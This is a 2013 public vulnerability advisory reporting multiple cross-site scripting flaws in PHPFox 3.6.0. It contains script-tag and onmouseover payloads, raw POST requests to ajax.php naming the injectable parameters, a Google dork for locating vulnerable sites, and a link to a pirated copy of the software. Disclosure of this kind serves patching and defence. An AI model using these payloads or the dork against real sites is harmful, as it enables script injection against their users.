PHPFox 3.6.0 Cross Site Scripting

------------------------------------------------------------
Exploit Title: PHPFox v3.6.0 (build6) Multiple Cross-Site Scripting vulnerabilities
------------------------------------------------------------
Author: #BHG Security Center
Date: Saturday, October 12, 2013
Vendor: http://www.phpfox.com
Software Link: http://dl.nuller.ir/PhpFox.Community.Edition.v3.6.0.Build.6.PHP.NULL-iND%5BNuLLeR.iR%5D.zip
Vulnerable Version(s): v3.6.0.Build.6 is vulnerable.
Tested Version: 3.6.0.Build.6
Vulnerability Type: Cross-Site Scripting
Google Dork: "Powered By PHPFox Version 3.6.0"?
Risk Level: High
Saftware Price : 299 $
Tested on: Windows, PHP 5.2
Vulnerability Video : http://www.youtube.com/watch?v=Yw7Wgr4LtGo&feature
-- Vulnerability discovered by: Net.Edit0r ( Dariush Nasirpour) - Email : Black.hat.tm@gmail.com

 
------------------------------------------------------------
== Proof of concept ==
------------------------------------------------------------
 [-] Description :
 [-] PoC 1.1: Xss Code Injection Join Field : 
 
1) Xss Code :  <script>alert(12)</script>  
2- Encode to :  &lt;script&gt;alert(12)&lt;/script&gt;
3- Put in First name Sign Up
4- After Login get your mouse on Recent Logins 
5- and you will see Xss Code was successful

------------------------------------------------------------
Vulnerable File(s):
                [+] ajax.php
				
Vulnerable Parameter(s):
                [+] sId
                [+] sInput
                [+] title
                [+] type
				
 [-] PoC 2.2:
 ## URL encoded POST input ( sId & sInput ) was set to <script>alert(0)</script>
 
 ## Request 

POST /upload/static/ajax.php HTTP/1.1
=undefined&core[ajax]=true&core[call]=captcha.reload&core
[is_admincp]=0&core[is_user_profile]=0&core[profile_user_id]
=0&core[security_token]=572157ee6d639d835e70475f46a6ef74&sId=[Inject XSS Code]&sInput=[Inject XSS Code]

 [-] PoC 3.3:
 ## URL encoded POST input ( title & type ) was set to " onmouseover=prompt(951977) bad="
 
  ## Request 
 
POST /upload/static/ajax.php HTTP/1.1
core[ajax]=true&core[call]=share.popup&core[security_token]=572157ee6d639d835e70475f46a6ef74
&feed_id=1&height=300&is_feed_view=1&sharemodule=event
&title=[Inject XSS Code]&type=[Inject XSS Code]&url=http%3A%2f%2fblack-hg.org%2findex.phpF%26width%3D550

------------------------------------------------------------
Timeline:
------------------------------------------------------------
Advisory Publication:  September 18, 2013  [without technical details]
Vendor Notification: September 18, 2013
Public Disclosure: October 12, 2013

#BHG Security Center
# Gr33tz:
# Blackhat Group Members : 3H34N,,G3n3Rall,l4tr0d3ctism,NoL1m1t,b3hz4d
# HUrr!c4nE,E2MA3N,solt6n,Dj.TiniVini